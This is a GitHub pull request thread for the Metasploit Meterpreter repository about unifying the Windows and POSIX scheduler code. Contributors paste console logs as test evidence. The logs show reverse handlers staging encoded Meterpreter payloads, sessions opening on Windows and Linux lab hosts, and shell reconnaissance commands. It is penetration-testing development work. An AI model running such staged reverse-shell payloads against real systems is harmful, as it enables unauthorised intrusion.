search

rapid7 / meterpreter

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
Other
326 stars 144 forks source link

Unify Windows and POSIX scheduler.c #124

Closed rwhitcroft closed 9 years ago

rwhitcroft commented 9 years ago

Builds happily, seems to run fine too.

Tested as follows:

msf exploit(handler) > 
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler...
[*] 10.10.123.194:55300 Request received for /xA1r...
[*] 10.10.123.194:55300 Staging connection for target /xA1r received...
[*] Encoded stage with x86/shikata_ga_nai
[*] Meterpreter session 1 opened (10.10.123.234:443 -> 10.10.123.194:55300) at 2015-02-06 13:53:34 -0500

msf exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information         Connection
  --  ----                   -----------         ----------
  1   meterpreter x86/win32  rw-lap\rw @ RW-LAP  10.10.123.234:443 -> 10.10.123.194:55300 (192.168.0.32)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getpid
Current pid: 8664
meterpreter > shell
Process 8584 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\rw\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC78-D818

 Directory of C:\Users\rw\Desktop

....

C:\Users\rw\Desktop>hostname
hostname
rw-lap

C:\Users\rw\Desktop>whoami
whoami
rw-lap\rw

--

[*] Started reverse handler on 10.10.123.234:443 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 162.243.232.241
[*] Meterpreter session 1 opened (10.10.123.234:443 -> 162.243.232.241:39466) at 2015-02-06 13:56:36 -0500

meterpreter > getpid
Current pid: 5695
meterpreter > shell
Process 5704 created.
Channel 1 created.
$ pwd
/home/rw
$ getent passwd rw
rw:x:1000:1000:,4,,:/home/rw:/bin/bash
$ cat /etc/issue
Ubuntu 14.04.1 LTS \n \l

$
metasploit-public-bot commented 9 years ago

Can one of the admins verify this patch? For more information see: https://github.com/rapid7/meterpreter/wiki/CI-Testing

todb-r7 commented 9 years ago

jenkins, this is ok to test

metasploit-public-bot commented 9 years ago

Test PASSED. Refer to this link for build results (access rights to CI server needed): https://ci.metasploit.com//job/GPR-MeterpreterWin/147/ Test PASSED.

OJ commented 9 years ago

Nice work @rwhitcroft. Thanks again for the effort! I'll get onto this later today (my boy's birthday today, so, priorities!)

Cheers mate.

OJ commented 9 years ago

Processing :metal:

OJ commented 9 years ago

Linux working much better this time!

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1241088 bytes) to 10.1.10.40
[*] Meterpreter session 2 opened (10.1.10.40:8000 -> 10.1.10.40:49034) at 2015-02-09 20:51:05 +1000

meterpreter > shell
Process 9931 created.
Channel 1 created.
id
uid=1000(oj) gid=1000(oj) groups=1000(oj),10(wheel),1001(promiscuous) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2$ pwd
/home/oj/code/metasploit-framework
sh-4.2$ ls
CONTRIBUTING.md        features               msfpescan
COPYING            lib                msfrop
Gemfile            log                msfrpc
Gemfile.local.example  metasploit-framework-db.gemspec    msfrpcd
Gemfile.lock           metasploit-framework-full.gemspec  msfupdate
HACKING            metasploit-framework-pcap.gemspec  msfvenom
LICENSE            metasploit-framework.gemspec   packages
README.md          modules                plugins
Rakefile           msfbinscan             powershell_attack.txt
app            msfcli                 script
config             msfconsole             scripts
coverage           msfd               spec
data               msfelfscan             test
db             msfencode              tools
documentation          msfmachscan            unicorn.rc
external           msfpayload
sh-4.2$ exit
exit
^C
Terminate channel 1? [y/N]  y
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter >
OJ commented 9 years ago

Windows too

msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.38
[*] Meterpreter session 3 opened (10.1.10.40:8000 -> 10.1.10.38:63507) at 2015-02-09 20:53:03 +1000

meterpreter > shell
Process 2528 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\oj\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E819-ECA4

 Directory of C:\Users\oj\Desktop

02/01/2015  09:31 AM    <DIR>          .
02/01/2015  09:31 AM    <DIR>          ..
12/09/2014  02:55 PM           468,056 Dbgview.exe
12/08/2014  04:51 PM             6,144 revtcp8000-x64.exe
12/08/2014  04:51 PM            73,802 revtcp8000-x86.exe
01/30/2015  12:40 PM             7,678 run-nouac.bat
               4 File(s)        556,706 bytes
               2 Dir(s)  32,691,019,776 bytes free

C:\Users\oj\Desktop>exit
meterpreter > getuid
Server username: WIN-TV01I7GG7JK\oj
meterpreter >
OJ commented 9 years ago

Looking good. Landing.

OJ commented 9 years ago

Thanks @rwhitcroft !

rwhitcroft commented 9 years ago

Thanks @OJ :)